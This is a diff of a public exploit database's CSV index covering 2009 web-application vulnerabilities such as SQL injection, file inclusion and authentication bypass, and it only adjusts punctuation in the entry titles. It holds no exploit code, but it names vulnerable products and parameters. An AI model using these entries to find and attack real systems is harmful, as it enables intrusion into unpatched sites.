Component com_na_newsdescription - 'newsid' SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7672,platforms/php/webapps/7672.txt,"PHPAuctionSystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0 @@ -21217,7 +21218,7 @@ id,file,description,date,author,platform,type,port 7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READ - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 -7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 +7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php?INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0 7746,platforms/php/webapps/7746.txt,"Joomla! Component gigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0 @@ -21306,7 +21307,7 @@ id,file,description,date,author,platform,type,port 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - 'userid' SQL Injection",2009-01-26,nuclear,php,webapps,0 -7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 +7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php?cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 7879,platforms/php/webapps/7879.pl,"SiteXS CMS 0.1.1 - Local File Inclusion",2009-01-26,darkjoker,php,webapps,0 7880,platforms/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,php,webapps,0 7881,platforms/php/webapps/7881.txt,"Joomla! Component ElearningForce Flash Magazine Deluxe - SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0 @@ -21370,7 +21371,7 @@ id,file,description,date,author,platform,type,port 7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - 'synTarget' Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusions",2009-02-04,make0day,php,webapps,0 -7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0 +7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php?l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 @@ -21412,7 +21413,7 @@ id,file,description,date,author,platform,type,port 8034,platforms/php/webapps/8034.txt,"Mynews 0.10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0 -8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0 +8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - 'jumpUrl' Remote File Disclosure",2009-02-10,Lolek,php,webapps,0 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0 8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",php,webapps,0 @@ -21421,7 +21422,7 @@ id,file,description,date,author,platform,type,port 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - 'query' SQL Injection",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'id' SQL Injection",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 -8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary '.ASP' File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 +8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - 'Arbitrary '.ASP' File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion",2009-02-13,bd0rk,php,webapps,0 @@ -21448,7 +21449,7 @@ id,file,description,date,author,platform,type,port 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - 'admin.txt' File Disclosure",2009-02-20,Pouya_Server,php,webapps,0 -8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection (via SQL Injection)",2009-02-20,Osirys,php,webapps,0 +8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection 'via SQL Injection'",2009-02-20,Osirys,php,webapps,0 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated Admin Bypass",2009-02-23,ahmadbady,php,webapps,0 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 @@ -21464,8 +21465,8 @@ id,file,description,date,author,platform,type,port 8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8112,platforms/php/webapps/8112.txt,"Golabi CMS 1.0 - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0 8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0 -8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0 -8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0 +8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - BBCode IMG Privilege Escalation",2009-02-26,StAkeR,php,webapps,0 +8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - 'IMG' Privilege Escalation",2009-02-26,Inphex,php,webapps,0 8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - Authentication Bypass",2009-02-26,rootzig,php,webapps,0 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0 @@ -21488,11 +21489,11 @@ id,file,description,date,author,platform,type,port 8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0 8166,platforms/php/webapps/8166.txt,"Wili-CMS 0.4.0 - Local File Inclusion / Remote File Inclusion / Authentication Bypass",2009-03-06,"Salvatore Fresta",php,webapps,0 -8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - 'praises.php id' SQL Injection",2009-03-06,dun,php,webapps,0 +8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - 'praises.php?id' SQL Injection",2009-03-06,dun,php,webapps,0 8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk 1.6.5.7 - Local File Inclusion",2009-03-06,dun,php,webapps,0 8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injections",2009-03-09,"Salvatore Fresta",php,webapps,0 8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 -8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (SQL Into Outfile) 'eval()' Injection",2009-03-09,StAkeR,php,webapps,0 +8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - SQL Into Outfile 'eval()' Injection",2009-03-09,StAkeR,php,webapps,0 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - 'base_id' SQL Injection",2009-03-09,d3b4g,php,webapps,0 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,php,webapps,0 @@ -21512,8 +21513,8 @@ id,file,description,date,author,platform,type,port 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection",2009-03-16,SirGod,php,webapps,0 8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection / SQL Injection",2009-03-16,SirGod,php,webapps,0 8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - 'entry_id' SQL Injection",2009-03-16,boom3rang,php,webapps,0 -8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0 -8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 +8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - 'SearchOption' Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0 +8228,platforms/php/webapps/8228.txt,"GDL 4.x - 'node' SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0 8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Remote File Inclusion",2009-03-17,Garry,php,webapps,0 8237,platforms/php/webapps/8237.txt,"Facil-CMS 0.1RC2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 @@ -21524,23 +21525,23 @@ id,file,description,date,author,platform,type,port 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0 8252,platforms/php/webapps/8252.txt,"Pixie CMS - Cross-Site Scripting / SQL Injection",2009-03-20,"Justin Keane",php,webapps,0 -8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - (UserGallery) Blind SQL Injection",2009-03-23,Invisibility,php,webapps,0 -8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - 'valor.php noticia' SQL Injection",2009-03-23,p3s0k!,php,webapps,0 -8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - 'get_read.php section' SQL Injection",2009-03-23,dun,php,webapps,0 +8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - 'UserGallery' Blind SQL Injection",2009-03-23,Invisibility,php,webapps,0 +8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - 'valor.php?noticia' SQL Injection",2009-03-23,p3s0k!,php,webapps,0 +8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - 'get_read.php?section' SQL Injection",2009-03-23,dun,php,webapps,0 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,php,webapps,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - Command Execution (via SQL Injection)",2009-03-23,darkjoker,php,webapps,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Injection",2009-03-23,Osirys,php,webapps,0 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0 -8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - (name) Local File Inclusion",2009-03-24,dun,php,webapps,0 +8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - 'name' Local File Inclusion",2009-03-24,dun,php,webapps,0 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b C1 HFP1 - Privilege Escalation",2009-03-24,Nine:Situations:Group,php,webapps,0 -8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - 'view.php id' SQL Injection",2009-03-24,x0r,php,webapps,0 +8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - 'view.php?id' SQL Injection",2009-03-24,x0r,php,webapps,0 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0 8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - 'upldgallery.php' Arbitrary File Upload",2009-03-25,"Ahmad Pay",php,webapps,0 8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,php,webapps,0 8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusions",2009-03-26,ahmadbady,php,webapps,0 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps,0 -8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0 +8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - 'category_id' SQL Injection",2009-03-27,G4N0K,php,webapps,0 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - Authentication Bypass",2009-03-27,Qabandi,php,webapps,0 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 @@ -21552,34 +21553,34 @@ id,file,description,date,author,platform,type,port 8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - 'members.php' SQL Injection",2009-03-30,SirGod,php,webapps,0 8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution",2009-03-30,Osirys,php,webapps,0 -8318,platforms/php/webapps/8318.txt,"JobHut 1.2 - (pk) SQL Injection",2009-03-30,K-159,php,webapps,0 +8318,platforms/php/webapps/8318.txt,"JobHut 1.2 - 'pk' SQL Injection",2009-03-30,K-159,php,webapps,0 8319,platforms/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0 8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injections",2009-03-31,"Salvatore Fresta",php,webapps,0 8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution",2009-03-31,BlackHawk,php,webapps,0 8326,platforms/php/webapps/8326.rb,"VirtueMart 1.1.2 - SQL Injection (Metasploit)",2009-03-31,waraxe,php,webapps,0 8327,platforms/php/webapps/8327.txt,"virtuemart 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps,0 -8328,platforms/php/webapps/8328.txt,"webEdition 6.0.0.4 - (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 +8328,platforms/php/webapps/8328.txt,"webEdition 6.0.0.4 - 'WE_LANGUAGE' Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 8329,platforms/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User",2009-03-31,"ThE g0bL!N",php,webapps,0 -8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - (course_id) SQL Injection",2009-03-31,DarKdewiL,php,webapps,0 -8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 - 'gamestat.php gameID' SQL Injection",2009-03-31,Dimi4,php,webapps,0 +8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - 'course_id' SQL Injection",2009-03-31,DarKdewiL,php,webapps,0 +8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 - 'gamestat.php?gameID' SQL Injection",2009-03-31,Dimi4,php,webapps,0 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusions",2009-04-01,ahmadbady,php,webapps,0 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' SQL Injection",2009-04-01,cOndemned,php,webapps,0 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0 8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 -8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 +8348,platforms/php/webapps/8348.txt,"form2list - 'page.php?id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0 8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - 'topic_id' SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,php,webapps,0 8353,platforms/php/webapps/8353.txt,"Joomla! Component com_bookJoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0 8355,platforms/php/webapps/8355.txt,"FlexCMS Calendar - 'itemID' Blind SQL Injection",2009-04-06,Lanti-Net,php,webapps,0 -8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 - (skin) Local File Inclusion",2009-04-06,LOTFREE,php,webapps,0 +8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 - 'skin' Local File Inclusion",2009-04-06,LOTFREE,php,webapps,0 8361,platforms/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0 8362,platforms/php/webapps/8362.php,"Lanius CMS 0.5.2 - Arbitrary File Upload",2009-04-07,EgiX,php,webapps,0 8364,platforms/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0 8365,platforms/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - 'category' SQL Injection",2009-04-08,H!tm@N,php,webapps,0 -8366,platforms/php/webapps/8366.txt,"Joomla! Component MailTo - (article) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 -8367,platforms/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - (viewit) Directory Traversal",2009-04-08,H!tm@N,php,webapps,0 +8366,platforms/php/webapps/8366.txt,"Joomla! Component MailTo - 'article' SQL Injection",2009-04-08,H!tm@N,php,webapps,0 +8367,platforms/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - 'viewit' Directory Traversal",2009-04-08,H!tm@N,php,webapps,0 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 8373,platforms/php/webapps/8373.txt,"Xplode CMS - 'wrap_script' SQL Injection",2009-04-08,PLATEN,php,webapps,0 8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - 'db.mdb' Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 @@ -21593,7 +21594,7 @@ id,file,description,date,author,platform,type,port 8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0 8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0 -8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 - (refer_id) Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0 +8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 - 'refer_id' Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0 8394,platforms/php/webapps/8394.txt,"moziloCMS 1.11 - Local File Inclusion / Full Path Disclosure / Cross-Site Scripting",2009-04-10,SirGod,php,webapps,0 8395,platforms/php/webapps/8395.txt,"RedaxScript 0.2.0 - 'Language' Local File Inclusion",2009-04-10,SirGod,php,webapps,0 8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps,0 @@ -21604,23 +21605,23 @@ id,file,description,date,author,platform,type,port 8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,php,webapps,0 8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps,0 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0 -8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 +8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - Cross-Site Scripting / File Disclosure",2009-04-13,AlpHaNiX,php,webapps,0 8423,platforms/php/webapps/8423.txt,"Jamroom 4.0.2 - 't' Local File Inclusion",2009-04-14,zxvf,php,webapps,0 8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection",2009-04-14,DSecRG,php,webapps,0 8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting",2009-04-14,SirDarckCat,php,webapps,0 -8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - 'index.php lang' Local File Inclusion",2009-04-14,SirGod,php,webapps,0 +8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - 'index.php?lang' Local File Inclusion",2009-04-14,SirGod,php,webapps,0 8432,platforms/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,php,webapps,0 8435,platforms/php/webapps/8435.txt,"phpEmployment - 'conf.inc' File Disclosure",2009-04-14,InjEctOr5,php,webapps,0 -8436,platforms/php/webapps/8436.txt,"Job2C 4.2 - (profile) Arbitrary File Upload",2009-04-15,InjEctOr5,php,webapps,0 +8436,platforms/php/webapps/8436.txt,"Job2C 4.2 - 'profile' Arbitrary File Upload",2009-04-15,InjEctOr5,php,webapps,0 8437,platforms/php/webapps/8437.txt,"phpAdBoard - 'conf.inc' Remote Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8438,platforms/php/webapps/8438.txt,"phpGreetCards - Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8439,platforms/php/webapps/8439.txt,"W2B Restaurant 1.2 - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8440,platforms/php/webapps/8440.txt,"phpAdBoardPro - 'config.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8441,platforms/php/webapps/8441.txt,"phpDatingClub - 'conf.inc' File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 -8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 +8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - 'adtype' Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 +8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 @@ -21630,33 +21631,33 @@ id,file,description,date,author,platform,type,port 8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - 'ficha.php' SQL Injection",2009-04-16,snakespc,php,webapps,0 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - '/manage-admin.php' Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusions",2009-04-16,JosS,php,webapps,0 -8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 +8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Authentication Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - Authentication Bypass",2009-04-17,YEnH4ckEr,php,webapps,0 -8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 +8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - 'slug' Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 